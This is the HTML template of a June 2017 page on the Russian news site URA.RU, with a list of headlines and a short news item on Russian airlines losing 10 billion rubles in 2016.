		<div class="list-scroll" ng-hide="1">
							<div class="list-scroll-container" ng-repeat="(i, l) in list">
					<div class="list-scroll-date"><span>06&nbsp;июня&nbsp;2017</span></div>
					<ul>
																					<li class="list-scroll-item ">
									<a href="/news/1052292266">
																																																			<span class="time">11:29</span>
																				<span class="list-scroll-item-title ">&laquo;Дословно повторяет Обаму&raquo;. Пушков ответил вице-президенту США, поставившему Россию в&nbsp;один ряд с&nbsp;террористами</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292262">
																																																			<span class="time">10:59</span>
																				<span class="list-scroll-item-title ">Российские авиакомпании за&nbsp;год потеряли 10 млрд рублей</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292240">
																																																			<span class="time">10:57</span>
																				<span class="list-scroll-item-title ">&laquo;Уральский пельмень&raquo; Дмитрий Соколов передумал давать дочке необычное&nbsp;имя. ФОТО</span>
									</a>
								</li>
																												<li class="list-scroll-item list-scroll-item-article">
									<a href="/articles/1036271177">
																					<div class="list-scroll-item-article-img" style="background-image: url('https://s.ura.news/pics/80/80/images/news/upload/2017/06/05/288110_Miting_protiv_zakona_o_renovatsii_Moskvi_Moskva_plakati_miting_renovatsiya_760x0_5760.3840.0.0_420.jpg');"></div>
																																																		<span class="list-scroll-item-title list-scroll-item-article-title">Екатеринбург в группе риска, Челябинск — в 15-ке. И все из-за Москвы</span>
									</a>
								</li>
																												<li class="list-scroll-item  important">
									<a href="/news/1052292256">
																																																			<span class="time">10:34</span>
																				<span class="list-scroll-item-title ">В&nbsp;доказательствах вины России в&nbsp;крушении &laquo;Боинга&raquo; над Донбассом нашли фотомонтаж. ФОТО</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292257">
																																																			<span class="time">10:20</span>
																				<span class="list-scroll-item-title ">Зрелище не&nbsp;для слабонервных. Тиграм в&nbsp;зоопарке скормили живого осла. ВИДЕО</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292255">
																																																			<span class="time">09:52</span>
																				<span class="list-scroll-item-title ">Появились первые снимки Ирины Шейк и&nbsp;Брэдли Купера с&nbsp;ребенком. ФОТО</span>
									</a>
								</li>
																												<li class="list-scroll-item list-scroll-item-article">
									<a href="/articles/1036271172">
																					<div class="list-scroll-item-article-img" style="background-image: url('https://s.ura.news/pics/80/80/images/news/upload/2017/06/05/161922_Terrorizm_terroristi_oruzhie_avtomati_terrorizm_terroristi_voennie_deystviya_420x288_2668.1828.0.0.jpg');"></div>
																																																		<span class="list-scroll-item-title list-scroll-item-article-title">Почему россиянам стоит следить за новостями о изоляции Катара</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292253">
																																																			<span class="time">09:30</span>
																				<span class="list-scroll-item-title ">Вице-президент США назвал главными угрозами в&nbsp;мире Россию, Иран и&nbsp;терроризм</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292250">
																																																			<span class="time">09:14</span>
																				<span class="list-scroll-item-title ">Врачи рассказали подробности тяжелой болезни Пугачевой</span>
									</a>
								</li>
																												<li class="list-scroll-item  important">
									<a href="/news/1052292248">
																																																			<span class="time">09:07</span>
																				<span class="list-scroll-item-title ">Власти России отследят враждебную активность иностранных государств. Это ответ на&nbsp;действия США и&nbsp;Европы</span>
									</a>
								</li>
																												<li class="list-scroll-item list-scroll-item-article">
									<a href="/articles/1036271169">
																					<div class="list-scroll-item-article-img" style="background-image: url('https://s.ura.news/pics/80/80/images/news/upload/2017/06/05/220394_Prakticheskaya_strelyba_iz_pistoleta_Ekaterinburg_pistolet_uhod_chistka_oruzhiya_razbor_oruzhiya_760x0_2605.1732.0.0_420.jpg');"></div>
																																																		<span class="list-scroll-item-title list-scroll-item-article-title">«Против права россиян на оружие выступает криминал»</span>
									</a>
								</li>
																												<li class="list-scroll-item  important">
									<a href="/news/1052292247">
																																																			<span class="time">09:00</span>
																				<span class="list-scroll-item-title ">В&nbsp;Екатеринбурге избили депутата, рейтинг переизбирающихся губернаторов, святые 90-е Наины Ельциной. Главное за&nbsp;ночь&nbsp;&mdash; на&nbsp;&laquo;URA.RU&raquo;</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292249">
																																																			<span class="time">08:51</span>
																				<span class="list-scroll-item-title ">Авианосцы США ушли из&nbsp;Японского моря. Пентагон может передумать в&nbsp;любой момент</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292246">
																																																			<span class="time">08:27</span>
																				<span class="list-scroll-item-title ">Тревога! В&nbsp;Крыму подняли в&nbsp;воздух истребители Су-27</span>
									</a>
								</li>
																												<li class="list-scroll-item list-scroll-item-article">
									<a href="/articles/1036271166">
																					<div class="list-scroll-item-article-img" style="background-image: url('https://s.ura.news/pics/80/80/images/news/upload/2017/06/04/46342_Vladislav_Surkov_surkov_vladislav_760x0_5062.3375.0.0_420.jpg');"></div>
																																																		<span class="list-scroll-item-title list-scroll-item-article-title">Как YouTube стал проблемой. И почему его ждет судьба Telegram</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292245">
																																																			<span class="time">08:16</span>
																				<span class="list-scroll-item-title ">Уже восемь стран разорвали отношения с&nbsp;Катаром из-за связей с&nbsp;террористами</span>
									</a>
								</li>
																												<li class="list-scroll-item  important">
									<a href="/news/1052292244">
																																																			<span class="time">08:12</span>
																				<span class="list-scroll-item-title ">Российские банки возвращают ипотеку без первоначального взноса</span>
									</a>
								</li>
																												<li class="list-scroll-item  important">
									<a href="/news/1052292242">
																																																			<span class="time">08:09</span>
																				<span class="list-scroll-item-title ">Сенаторы создадут Русский мир для защиты соотечественников даже за&nbsp;пределами страны</span>
									</a>
								</li>
																												<li class="list-scroll-item list-scroll-item-article">
									<a href="/articles/1036271154">
																					<div class="list-scroll-item-article-img" style="background-image: url('https://s.ura.news/pics/80/80/images/news/upload/2017/06/02/292369_Snegopad_v_mae_Surgut_plohaya_pogoda_zhenshtina_s_zontom_snegopad_420x288_4619.3169.0.0.jpg');"></div>
																																																		<span class="list-scroll-item-title list-scroll-item-article-title">«Смерчи в России пока не научились предсказывать»</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292243">
																																																			<span class="time">08:00</span>
																				<span class="list-scroll-item-title ">Первый &laquo;летающий автомобиль&raquo; продержался в&nbsp;воздухе две секунды. ВИДЕО</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292241">
																																																			<span class="time">07:55</span>
																				<span class="list-scroll-item-title ">Всех задержанных из-за теракта в&nbsp;Лондоне отпустили</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292239">
																																																			<span class="time">07:43</span>
																				<span class="list-scroll-item-title ">В&nbsp;США арестована девушка, из-за которой Россию обвинили во&nbsp;вмешательстве в&nbsp;выборы Трампа</span>
									</a>
								</li>
																												<li class="list-scroll-item list-scroll-item-article">
									<a href="/articles/1036271161">
																					<div class="list-scroll-item-article-img" style="background-image: url('https://s.ura.news/pics/80/80/images/news/upload/2017/06/03/293752_Traditsionniy_splav_po_reke_Chusovoy_dvizheniya_V_zashtitu_cheloveka_truda_Sverdlovskaya_oblasty_derevnya_Sloboda_760x0_4117.2745.0.0_420.jpg');"></div>
																																																		<span class="list-scroll-item-title list-scroll-item-article-title">Холманских готов повторить свой фирменный ход с танками и либералами</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292238">
																																																			<span class="time">07:28</span>
																				<span class="list-scroll-item-title ">Пермская &laquo;Анджелина Джоли&raquo; впечатлила откровенным снимком из&nbsp;бассейна. ФОТО</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292237">
																																																			<span class="time">07:19</span>
																				<span class="list-scroll-item-title ">Wikileaks опубликовал скандальное письмо Хиллари Клинтон. Власти США знали о&nbsp;поддержке террористов Катаром</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292236">
																																																			<span class="time">07:04</span>
																				<span class="list-scroll-item-title ">Интервью Путина телеканалу NBC посмотрели шесть миллионов американцев</span>
									</a>
								</li>
																												<li class="list-scroll-item list-scroll-item-article">
									<a href="/articles/1036271160">
																					<div class="list-scroll-item-article-img" style="background-image: url('https://s.ura.news/pics/80/80/images/news/upload/2017/06/03/293284_Sankt_Peterburgskiy_mezhdunarodniy_ekonomicheskiy_forum_Perviy_deny_Sankt_Peterburg_760x0_5760.3840.0.0_420.jpg');"></div>
																																																		<span class="list-scroll-item-title list-scroll-item-article-title">«Наш шеф ездит в Питер без свиты. Ибо дорого»</span>
									</a>
								</li>
																												<li class="list-scroll-item  important">
									<a href="/news/1052292235">
																																																			<span class="time">06:58</span>
																				<span class="list-scroll-item-title ">Россияне стали вдвое чаще страдать от&nbsp;ожирения</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292234">
																																																			<span class="time">06:29</span>
																				<span class="list-scroll-item-title ">Катар перечислил международным террористам миллиард долларов</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292233">
																																																			<span class="time">05:53</span>
																				<span class="list-scroll-item-title ">Астрономы обнаружили одну из&nbsp;самых горячих из&nbsp;известных планет</span>
									</a>
								</li>
																												<li class="list-scroll-item list-scroll-item-article">
									<a href="/articles/1036271159">
																					<div class="list-scroll-item-article-img" style="background-image: url('https://s.ura.news/pics/80/80/images/news/upload/2017/06/03/45d8b7f0251c037968cbd4f9774c4165_760x0_656.443.0.45_420.jpg');"></div>
																																																		<span class="list-scroll-item-title list-scroll-item-article-title">«Растет новая Собчак. Это новые амбиции, новое воспитание»</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292232">
																																																			<span class="time">05:07</span>
																				<span class="list-scroll-item-title ">Россия ответит Черногории &laquo;на&nbsp;основе принципа взаимности&raquo;</span>
									</a>
								</li>
																												<li class="list-scroll-item  important">
									<a href="/news/1052292231">
																																																			<span class="time">04:21</span>
																				<span class="list-scroll-item-title ">МВД предложило повысить госпошлины на&nbsp;документы нового образца</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292229">
																																																			<span class="time">03:12</span>
																				<span class="list-scroll-item-title ">Россия обыграла Венгрию в&nbsp;контрольном матче</span>
									</a>
								</li>
																												<li class="list-scroll-item list-scroll-item-article">
									<a href="/articles/1036271168">
																					<div class="list-scroll-item-article-img" style="background-image: url('https://s.ura.news/pics/80/80/images/news/upload/2017/06/05/5fc7b86b21c7c3a3e79f2187e145c4a9_760x0_804.577.125.92_420.jpg');"></div>
																																																		<span class="list-scroll-item-title list-scroll-item-article-title">В Тюменском госуниверситете открывается элитный бакалавриат</span>
									</a>
								</li>
																												<li class="list-scroll-item  important">
									<a href="/news/1052292227">
																																																			<span class="time">02:02</span>
																				<span class="list-scroll-item-title ">Эрдоган позвонил Путину, чтобы обсудить Катар, Сирию и&nbsp;&laquo;Турецкий поток&raquo;</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292226">
																																																			<span class="time">01:32</span>
																				<span class="list-scroll-item-title ">Преступник, расстрелявший людей в&nbsp;Орландо, оказался бывшим военным</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292224">
																																																			<span class="time">01:07</span>
																				<span class="list-scroll-item-title ">Московское метро осталось без &laquo;входов&raquo;</span>
									</a>
								</li>
																												<li class="list-scroll-item list-scroll-item-article">
									<a href="/articles/1036271158">
																					<div class="list-scroll-item-article-img" style="background-image: url('https://s.ura.news/pics/80/80/images/news/upload/2017/06/03/259122_Ministerstvo_Inostrannih_Del_Moskva_lavrov_sergey_760x0_3894.2590.0.0_420.jpg');"></div>
																																																		<span class="list-scroll-item-title list-scroll-item-article-title">Не означает ли череда дипскандалов кризис в МИДе?</span>
									</a>
								</li>
																												<li class="list-scroll-item ">
									<a href="/news/1052292225">
																																																			<span class="time">00:33</span>
																				<span class="list-scroll-item-title ">Apple даст ассистенту Siri возможность работать без интернета</span>
									</a>
								</li>
																		</ul>
				</div>
					</div>
		<div class="list-scroll" ng-cloak>
			<div ng-show="old" class="old-news list-scroll-item" du-scrollspy="{{old.type}}_{{old.id}}" offset="400">
				<a href="/{{old.type}}/{{old.id}}" id="_{{old.type}}_{{old.id}}" data-title="{{old.seo_title?old.seo_title:old.title}}"><span ng-bind-html="old.title"></span></a>
			</div>
			<div class="list-scroll-container" ng-repeat="(i, l) in list" on-last-repeat>
				<div class="list-scroll-date"><span ng-bind-html="l.date"></span></div>
				<ul>
					<li ng-if="n.story_ext_type" class="list-scroll-item spec-project spec-story-t{{n.story_ext_type}}" ng-repeat="n in l.items" ng-class="{'active': n.selected, 'important': n.important == 1, 'list-scroll-item-article': n.announce_pic}" du-scrollspy="{{n.type}}_{{n.id}}" offset="{{(i==0 && $index==0)?250:150}}">
						<a href="/{{n.type}}/{{n.id}}" id="_{{n.type}}_{{n.id}}" data-title="{{n.page_title}}" data-image="{{n.announce_pic}}" ng-click="showItem($event, n.type, n.id)">
							<div back-img="https://s.ura.news/pics/80/80/images/news/{{n.announce_pic}}" ng-if="n.announce_pic" class="list-scroll-item-article-img"></div>
							<div back-img="https://s.ura.news/images/news/{{n.ext_news_f1}}" ng-if="n.story_ext_type == 2 && n.ext_news_f1" class="list-scroll-item-spec-project-img"></div>
							<span class="time" ng-if="n.time">{{n.time}}</span>
							<span class="list-scroll-item-title" ng-class="{'list-scroll-item-article-title': n.announce_pic}" ng-bind-html="n.title"></span>
							<span ng-if="n.comm_cnt" class="comm-sm" ng-class="{'comm-sm-red':n.comm_cnt>=10}" ng-click="showItem($event, n.type, n.id, 'comments'+n.id)">{{n.comm_cnt}}</span>
						</a>
					</li>
					<li ng-if="!n.story_ext_type" class="list-scroll-item" ng-repeat="n in l.items" ng-class="{'active': n.selected, 'important': n.important == 1, 'list-scroll-item-article': n.announce_pic, 'ten-years': n.is_ten_years==1, 'spec-project': n.is_spec_project==1}" du-scrollspy="{{n.type}}_{{n.id}}" offset="{{(i==0 && $index==0)?250:150}}">
						<a href="/{{n.type}}/{{n.id}}" id="_{{n.type}}_{{n.id}}" data-title="{{n.page_title}}" data-image="{{n.announce_pic}}" ng-click="showItem($event, n.type, n.id)">
							<div back-img="https://s.ura.news/pics/80/80/images/news/{{n.announce_pic}}" ng-if="n.announce_pic" class="list-scroll-item-article-img"></div>
							<div back-img="https://s.ura.news/images/news/{{n.ten_years_img}}" ng-if="n.ten_years_img" class="list-scroll-item-ten-years-img"></div>
							<div back-img="https://s.ura.news/images/news/{{n.spec_project_img}}" ng-if="n.spec_project_img" class="list-scroll-item-spec-project-img"></div>
							<span class="time" ng-if="n.time">{{n.time}}</span>
							<span class="list-scroll-item-title" ng-class="{'list-scroll-item-article-title': n.announce_pic}" ng-bind-html="n.title"></span>
							<span ng-if="n.comm_cnt" class="comm-sm" ng-class="{'comm-sm-red':n.comm_cnt>=10}" ng-click="showItem($event, n.type, n.id, 'comments'+n.id)">{{n.comm_cnt}}</span>
						</a>
					</li>
				</ul>
			</div>
		</div>
	</div>
</div>
<script>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</script>

			
		</td>
		<td class="cl-main">
			<table style="width: 100%;margin-top: 20px;" infinite-scroll="nextItem()" infinite-scroll-distance="1"
	   infinite-scroll-immediate-check="true" infinite-scroll-disabled="busy || items.length >= 10000 || end"
	   class="center"
	   xmlns="http://www.w3.org/1999/html">
<tr ng-repeat="(counter_number, item) in items" id="{{item.type}}_{{item.id}}">
<td class="cl-center">

<div ng-if="$index==0">


	<div class="item-banners">
		<div class="day-news-block m-resize">
			<table style="width: 100%;">
				<tr>
					<td class="title">Главные&nbsp;новости&nbsp;Москвы</td>
					<td id="day_news_indicator"></td>
				</tr>
			</table>
			<div id="day_news" data-page="0">
									<div id="day_news_prev"></div>
					<div id="day_news_next"></div>
													<div id="day_news_prev_lg"></div>
					<div id="day_news_next_lg"></div>
								<div id="day_news_items_container">
					<ul id="day_news_items" style="position: relative">
													<li onclick="ga('send', 'event', 'Главные новости Москвы', 'Переход на /news/1052292244 mbid:116585', 'Источник публикация msk');"><a href="/news/1052292244" class="day-news-announce"><span class="red">1.</span>&nbsp;Российские банки возвращают ипотеку без первого взноса</a></li>
													<li onclick="ga('send', 'event', 'Главные новости Москвы', 'Переход на /news/1052292242 mbid:116586', 'Источник публикация msk');"><a href="/news/1052292242" class="day-news-announce"><span class="red">2.</span>&nbsp;Совет Федерации создаст Русский мир за границей</a></li>
													<li onclick="ga('send', 'event', 'Главные новости Москвы', 'Переход на /news/1052292191 mbid:116577', 'Источник публикация msk');"><a href="/news/1052292191" class="day-news-announce"><span class="red">3.</span>&nbsp;Ураган вернется. В Москве - штормовое предупреждение</a></li>
													<li onclick="ga('send', 'event', 'Главные новости Москвы', 'Переход на /news/1052292186 mbid:116578', 'Источник публикация msk');"><a href="/news/1052292186" class="day-news-announce"><span class="red">4.</span>&nbsp;«АвтоВАЗ» выпустит летающий автомобиль через 20 лет</a></li>
													<li onclick="ga('send', 'event', 'Главные новости Москвы', 'Переход на /news/1052292183 mbid:116579', 'Источник публикация msk');"><a href="/news/1052292183" class="day-news-announce"><span class="red">5.</span>&nbsp;Усманов выбрал лучшие мемы про спор с Навальным</a></li>
													<li onclick="ga('send', 'event', 'Главные новости Москвы', 'Переход на /news/1052292150 mbid:116564', 'Источник публикация msk');"><a href="/news/1052292150" class="day-news-announce"><span class="red">6.</span>&nbsp;Поклонская раскрыла тайну о своем муже</a></li>
													<li onclick="ga('send', 'event', 'Главные новости Москвы', 'Переход на /news/1052292132 mbid:116563', 'Источник публикация msk');"><a href="/news/1052292132" class="day-news-announce"><span class="red">7.</span>&nbsp;Россияне назвали своих главных друзей и врагов</a></li>
													<li onclick="ga('send', 'event', 'Главные новости Москвы', 'Переход на /news/1052292104 mbid:116538', 'Источник публикация msk');"><a href="/news/1052292104" class="day-news-announce"><span class="red">8.</span>&nbsp;Врачи будут доносить на школьниц, занимающихся сексом</a></li>
											</ul>
				</div>
			</div>
		</div>
	</div>


</div>

<div ng-hide="1">
	<div class="item">
		<div class="l-resize">
			<span class="item-time">10:59&nbsp;&nbsp;06&nbsp;июня&nbsp;2017</span>			<span class="com-cnt ">0</span>
		</div>
		<h1 class="l-resize item-title">Российские авиакомпании за&nbsp;год потеряли 10 млрд рублей</h1>
		<!-- авторы в статье -->
				<!-- текст -->
		<div class="item-text l-resize"><div class="item-text-incut">  <div class="item-img-block">  	<img class="item-img" src="https://s.ura.news/images/news/upload/news/292/262/1052292262/126723_Spotting_aeroport_Klipart_Ekaterinburg_vzlet_vzlet_samoleta_aviakompaniya_pobeda_pobeda_250x0_2385.1594.0.0.jpg" alt="Споттинг: аэропорт. Клипарт. Екатеринбург, взлет, взлет самолета, авиакомпания победа, pobeda">  	<div class="item-img-description">Ситуацию в отрасли не спасает даже господдержка<span class="item-img-author">Фото: Владимир Жабриков © URA.RU</span></div>  </div></div><p>Авиаотрасль в&nbsp;России из&nbsp;года в&nbsp;год остается убыточной, несмотря на&nbsp;государственную поддержку, заявил президент Ассоциации эксплуатантов воздушного транспорта Владимир Тасун.</p><p>Авиакомпании по-прежнему остаются нерентабельными: 2016 году они потерпели убытков на&nbsp;10 млрд рублей, рассказал Тасун&laquo;<a href="https://www.kommersant.ru/doc/3318378" target="_blank">Коммерсанту</a>&raquo;. В&nbsp;целом потери выросли почти на&nbsp;18%. Наименее выгодными являются внутренние перевозки. В&nbsp;2016 году убытки на&nbsp;этом направлении составили 33 миллиарда рублей, в&nbsp;2015 году&nbsp;&mdash; 45 миллиардов рублей.</p><p>Недополучение прибыли также произошло из-за снижения международных перевозок почти на&nbsp;18%. Основные затраты авиакомпаний приходятся на&nbsp;лизинг воздушных судов, аэропортовое обслуживание и&nbsp;аэронавигационные услуги, которые в&nbsp;прошлом году показали значительный рост, пишет &laquo;<a href="https://riafan.ru/806529-aviakompanii-rossii-za-god-poteryali-10-mlrd-rublei" target="_blank">Федеральное агентство новостей</a>&raquo;.</p><p>В&nbsp;то&nbsp;же время Тасун признал, что ситуацию в&nbsp;отрасли смог поддержать сниженный НДС на&nbsp;внутренних линиях. Налоговое бремя сократилось за&nbsp;год почти на&nbsp;40 млрд рублей.</p><p>Как писало &laquo;URA.RU&raquo; ранее, 1&nbsp;июня стало известно о&nbsp;том, что в&nbsp;России в&nbsp;будущем <a href="https://ura.news/news/1052291605" target="_blank">может появиться новая бюджетная авиакомпания</a> с&nbsp;иностранным участием. Финансовые инвесторы из&nbsp;РФ&nbsp;уже начали переговоры с&nbsp;несколькими крупными зарубежными лоукостерами, среди которых малазийский Air Asia, венгерский Wizz Air, турецкий Pegasus, а&nbsp;также Российский фонд прямых инвестиций.</p></div>
		<div>
			<div class="item-text l-resize"></div>
			<!-- ссылки по теме -->
						<!-- авторы в новости -->
							<table class="l-resize item-descr">
					<tr>
						<td style="width: 50%;">
							<table>
																	<tr>
										<td style="padding-right: 20px;padding-bottom: 10px;">
											<div>Юрий Викторов</div>
											<div class="sm">© Служба новостей «URA.Ru»</div>
										</td>
									</tr>
															</table>
						</td>
						<td style="width: 50%;">
							<table>
															</table>
						</td>
					</tr>
				</table>
						<!-- сюжет -->
					</div>
	</div>
</div>
<div ng-cloak>
	<div class="item" ng-show="item.loaded" ng-item-ready="">
		<div class="l-resize">
			<span class="item-time" ng-bind-html="item.time"></span>
			<span class="item-regions" ng-bind-html="item.regions_rubrics" ng-if="item.regions_rubrics"></span>
			<span class="com-cnt" ng-class="{'com-cnt-red': item.comments_count>=10}"
				ng-click="showItem($event, item.type, item.id, 'comments'+item.id)">{{item.comments_count}}</span>
		</div>
		<h1 ng-bind-html="item.title" class="l-resize item-title"></h1>

		<!-- авторы в статье -->
		<table class="l-resize item-descr" ng-if="item.type=='articles'">
			<tr>
				<td class="item-subtitle">
					<h3 ng-bind-html="item.subtitle"></h3>
				</td>
				<td class="item-authors item-authors-padding">
					<table>
						<tr ng-repeat="a in item.authors">
							<td style="padding-right: 20px;padding-bottom: 10px;">
								<div>{{a.id?a.name:a.author}}</div>
								<div class="sm">© Служба новостей «URA.Ru»</div>
							</td>
							<td style="position: relative;padding-bottom: 10px;">
								<div ng-if="a.id">
									<div class="btn-s btn-subs subs-author" ng-click="toggleSubscribe($event, 'author', a.id)" ng-class="{'checked':user.subs.author[a.id].checked}"><div id="login_panel_{{item.type}}_{{item.id}}_author_{{a.id}}" class="login-panel-container"></div></div>
								</div>
							</td>
						</tr>
					</table>
				</td>
			</tr>
		</table>

		<!-- соцкнопки -->
		<div class="l-resize top-share" ng-if="item.type=='articles'" ng-bind-html="item.share1"></div>

		<!-- текст -->
		<div ng-bind-html="item.text" class="item-text l-resize"></div>
		<div class="clear"></div>
		<div class="l-resize" ng-if="item.minimized">
			<a href="/articles/{{item.id}}" class="btn-l btn-more" ng-click="expandArticle($event, item)">прочитать статью полностью</a>
		</div>
		<div class="clear"></div>

		<div ng-if="!item.minimized">
			<div ng-bind-html="item.text2" class="item-text l-resize"></div>


			<!-- соцкнопки -->
			<div class="no-print">
				<p class="l-resize" style="margin-top:26px;"><span style="color:#0039a6;">Расскажите о новости своим друзьям</span></p>
				<div class="l-resize" ng-bind-html="item.share2"></div>
			</div>

			<!-- авторы в новости -->
			<table class="l-resize item-descr" ng-if="item.type=='news'">
				<tr>
					<td style="width: 50%;">
						<table>
							<tr ng-repeat="a in item.authors">
								<td style="padding-right: 20px;padding-bottom: 10px;">
									<div>{{a.id?a.name:a.author}}</div>
									<div class="sm">© Служба новостей «URA.Ru»</div>
								</td>
								<td style="position: relative;padding-bottom: 10px;">
									<div ng-if="a.id">
										<div class="btn-s btn-subs subs-author" ng-click="toggleSubscribe($event, 'author', a.id)" ng-class="{'checked':user.subs.author[a.id].checked}"><div id="login_panel_{{item.type}}_{{item.id}}_author_{{a.id}}" class="login-panel-container"></div></div>
									</div>
								</td>
							</tr>
						</table>
					</td>
					<td style="width: 50%;">
						<table>
							<tr ng-repeat="a in item.authors2">
								<td style="padding-right: 20px;padding-bottom: 10px;">
									<div>{{a.id?a.name:a.author}}</div>
									<div class="sm">© Служба новостей «URA.Ru»</div>
								</td>
								<td style="position: relative;padding-bottom: 10px;">
									<div ng-if="a.id">
										<div class="btn-s btn-subs subs-author" ng-click="toggleSubscribe($event, 'author', a.id)" ng-class="{'checked':user.subs.author[a.id].checked}"><div id="login_panel_{{item.type}}_{{item.id}}_author_{{a.id}}" class="login-panel-container"></div></div>
									</div>
								</td>
							</tr>
						</table>
					</td>
				</tr>
			</table>

			<!-- ссылки по теме -->
			<div class="l-resize item-links" ng-if="item.links">
				<div class="item-links-header">Ссылки по теме</div>
				<ul>
					<li ng-repeat="l in item.links"><a href="{{l.link_href}}" ng-bind-html="l.link_text"></a></li>
				</ul>
			</div>

			<!-- сюжет -->
			<div class="story-block" ng-if="!story_id && (item.story_next || item.story_prev)">
				<div class="story-block-header">
					<div class="title"><nobr>другие новости сюжета</nobr></div>
					<div class="story-block-title">
						<a href="/story/{{item.story_id}}" ng-bind-html="item.story.title"></a></div>
				</div>
				<table>
					<tr>
						<td class="story-block-prev">
							<a href="/{{item.story_prev.type}}/{{item.story_prev.id}}?story_id={{item.story_id}}" ng-if="item.story_prev">
								<div class="time">{{item.story_prev.date}}</div>
								<div ng-bind-html="item.story_prev.title"></div>
							</a>
						</td>
						<td class="story-block-next">
							<a href="/{{item.story_next.type}}/{{item.story_next.id}}?story_id={{item.story_id}}" ng-if="item.story_next">
								<div class="time">{{item.story_next.date}}</div>
								<div ng-bind-html="item.story_next.title"></div>
							</a>
						</td>
					</tr>
				</table>
			</div>

			<!-- комменты -->
			<a name="comments{{item.id}}" class="comment_anchor" ></a>
			<div class="l-resize no-print" ng-comments-ready="" ng-if="item.discuss">
				<div class="h1 com-title inline">Комментарии ({{item.comments_count}})</div>
				<div class="com-subs inline">
					<div class="btn-s btn-subs subs-comments" ng-click="toggleSubscribe($event, item.type, item.id)" ng-class="{'checked':user.subs[item.type][item.id].checked}">
						<div id="login_panel_{{item.type}}_{{item.id}}" class="login-panel-container"></div>
					</div>
				</div>

				<div ng-if="item.comments_count>0">
					<div ng-if="!item.comments_visible">
						<div ng-repeat="comment in item.comments" ng-include="'top_comment.html'" ng-if="$index<item.top_comments_cnt"></div>
						<div class="btn-l btn-more" ng-click="expandComments(item, null)" ng-if="item.comments_count>10">читать все комментарии</div>
					</div>
					<div ng-if="item.comments_visible" style="position: relative;">
						<div ng-repeat-start="comment in item.comments" ng-include="'comment.html'"></div>
						<div ng-repeat-end id="comment_form_{{item.type}}_{{item.id}}_{{comment.id}}"></div>
					</div>
				</div>

				<!-- root comment form -->
				<div id="comment_success_{{item.type}}_{{item.id}}"></div>
				<div class="h1 com-title" ng-if="!item.cf.is_reply">оставить свой комментарий</div>
				<div class="btn-l" ng-click="item.cf.show(null,false)" ng-if="item.cf.is_reply">оставить свой комментарий</div>
				<div id="comment_form_{{item.type}}_{{item.id}}"></div>
				<!-- /root comment form -->
			</div>
		</div>
		<div class="l-resize no-print" style="margin: 50px auto; ">
			<div ng-if="counter_number == 0">
				        <div id="diCINTGegm4Qh68" class="bannerPosition_c4"></div>
        <script type="text/javascript">
            $(document).ready(function(){

                var banner_data = {
                    banner_id:  Math.random().toString(36).substring(7)
                };

                $.ajax(
                    '/widgets/banner_loader/loader.php',
                    {
                        type:       'get',
                        data:       {type:'c4'},
                        dataType:   'json',
                        success:    (function(position, banner_data){return function(data){

							if (data.length > 0) {
							    var banner_code = data[Math.floor(Math.random()*data.length)];
							        banner_code = banner_code.replace(
							            /%%([a-z_]+)%%/g,
							            (function(banner_data){return function(str, value_name, offset, banner_code){
                                            return banner_data[value_name] ? banner_data[value_name] : '';
                                        };})(banner_data));
                            	$('#diCINTGegm4Qh68').html(banner_code);
							}

                        };})('c4', banner_data)
                    }
                )

            });
        </script>			</div>
			<div ng-if="counter_number != 0">
				<div ng-bind-html="item.center_banner"></div>
			</div>
		</div>
	</div>
</div>
</td>
<td class="cl-right">
    <div id="cl-right-addition">
		<div ng-if="$index==0">
			        <div id="ed3ucmSqwQUT2vL" class="bannerPosition_d1"></div>
        <script type="text/javascript">
            $(document).ready(function(){

                var banner_data = {
                    banner_id:  Math.random().toString(36).substring(7)
                };

                $.ajax(
                    '/widgets/banner_loader/loader.php',
                    {
                        type:       'get',
                        data:       {type:'d1'},
                        dataType:   'json',
                        success:    (function(position, banner_data){return function(data){

							if (data.length > 0) {
							    var banner_code = data[Math.floor(Math.random()*data.length)];
							        banner_code = banner_code.replace(
							            /%%([a-z_]+)%%/g,
							            (function(banner_data){return function(str, value_name, offset, banner_code){
                                            return banner_data[value_name] ? banner_data[value_name] : '';
                                        };})(banner_data));
                            	$('#ed3ucmSqwQUT2vL').html(banner_code);
							}

                        };})('d1', banner_data)
                    }
                )

            });
        </script>		</div>
	</div>
    <div id="cl-right-main">

	<div style="margin-bottom: 15px;">
		<div class="nw-18plus"></div>
		<div class="nw-search">
			<input type="text" placeholder="поиск" id="search" on-enter="search('{{search_q}}')" ng-model="search_q"/><button id="search_submit" ng-click="search(search_q)"></button>
	</div>
		<div class="clear"></div>
	</div>

	<div id="right_{{item.type}}_{{item.id}}">
		<div ng-bind-html="item.right_banner" style="margin-bottom:15px;height:421px;"></div>
		<div ng-bind-html="item.right_block"></div>
		<div style="position: relative;left: -9999px;height:1px;" id="counters_{{item.type}}_{{item.id}}">
			<div id="liveinternet_{{item.type}}_{{item.id}}"></div>
			<script type="text/javascript" src="/orphus/orphus.js" async="async"></script>
			<a href="//orphus.ru" id="orphus" target="_blank"><img alt="Система Orphus" src="/orphus/orphus.gif" border="0" width="240" height="80" /></a>
		</div>
